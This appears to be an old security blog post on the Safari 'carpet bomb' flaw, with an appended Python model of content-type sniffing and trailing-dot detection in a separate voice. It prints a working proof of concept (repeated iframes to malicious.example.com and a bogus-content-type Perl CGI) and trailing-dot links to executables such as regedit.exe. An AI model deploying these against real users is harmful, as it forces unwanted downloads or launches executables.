Carpet Woes.


OK, this is a re-hash of Nitesh Dhanjani's finding in the Apple Safari browser[1]. I read that Billy Rios[2] also found something similar in Firefox. That is very interesting, because I assumed -which is the mother of all fuckups- that Firefox was a bit stricter in checking content-types. Anyway, I read some discussion about it and wanted to give my take on it. I glanced over the examples provided by Nitesh, and I could not help uttering only one phrase: content negotiation. If I am not mistaken, the vulnerability is due to improper content negotiation, because the browser must determine the content type itself. If a server gives back a bogus content-type, the browser must check it again rather than accept the content-type verbatim, or else stream the content to the screen as text. It's the browser's duty to determine what it has to do with the file.

But there is more to the story. If a server-side language like Perl or PHP sends a bogus content-type, the default behavior, as with many content types, is to stream it as plain text. The problem can again be attributed to the browser, which instead hands the file to the Windows shell to download -or- execute it. My first thought was that it should stream it on screen as plain text, and that is still the browser's choice to make. So, long story short: the browser is the culprit, not Windows. I haven't dived deep enough into it, but it's my opinion and it seems obvious to me.

What some also don't know about Windows Explorer is how it handles file extensions. Here is a good example I have talked about before: if you place a period after a file extension, Windows Explorer tries to download it:

<a href="\WiNdOwS\regedit.exe.">Yo world!</a>

On Windows servers, this can get worse:

<a href="http://SERVER/somefile.php.">Yo world!</a>

Expected behavior? Yes and no. If the file is passed to the Win32 shell without a content check, the shell has no option other than to prompt for download, or to execute the file if it cannot find a proper extension.

Nitesh Dhanjani's Carpet Bomb:

<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>

Where:

#!/usr/bin/perl
# CGI script that answers with a bogus content-type and an empty body
print "Content-type: blah/blah\n\n";
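The two points above, how a browser should treat an unknown content-type such as blah/blah and how a trailing period hides the real Windows extension, as a small added model written for this post (not code from the original post, Nitesh's or Billy's). The allow-list of known types and the sample bodies are constructed:

```python
from typing import Tuple

# Types this toy "browser" knows how to render inline (constructed allow-list).
KNOWN_TYPES = {"text/html", "text/plain", "image/png", "application/pdf"}


def looks_binary(sample: bytes) -> bool:
    """Crude sniff of the first bytes: any control byte other than whitespace."""
    return any(b < 0x20 and b not in (0x09, 0x0A, 0x0D) for b in sample)


def decide(content_type: str, body_prefix: bytes) -> Tuple[str, str]:
    """Return ('render', type) or ('download', type) for one response.

    A known type is rendered as declared. An unknown or bogus type (the
    carpet-bomb CGI's 'blah/blah') is never passed through to the shell;
    the body is sniffed and text is shown on screen as text/plain.
    """
    ct = content_type.split(";", 1)[0].strip().lower()
    if ct in KNOWN_TYPES:
        return ("render", ct)
    if not looks_binary(body_prefix):
        return ("render", "text/plain")
    return ("download", "application/octet-stream")


def win32_effective_name(name: str) -> str:
    """Win32 silently strips trailing dots and spaces from a file name, so
    'regedit.exe.' is opened as regedit.exe although its visible extension
    is empty."""
    return name.rstrip(". ")


def extension_mismatch(name: str) -> bool:
    """True when the apparent extension differs from the one Windows will use;
    a defender can flag such link targets before handing them to the shell."""
    apparent = name.rsplit(".", 1)[-1] if "." in name else ""
    effective = win32_effective_name(name)
    effective_ext = effective.rsplit(".", 1)[-1] if "." in effective else ""
    return apparent != effective_ext


if __name__ == "__main__":
    print(decide("blah/blah", b"hello world\n"))      # ('render', 'text/plain')
    print(extension_mismatch("regedit.exe."))        # True
```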

[1]http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html
[2]http://xs-sniper.com/blog/2008/06/20/bk-on-safari-hunting-firefox/
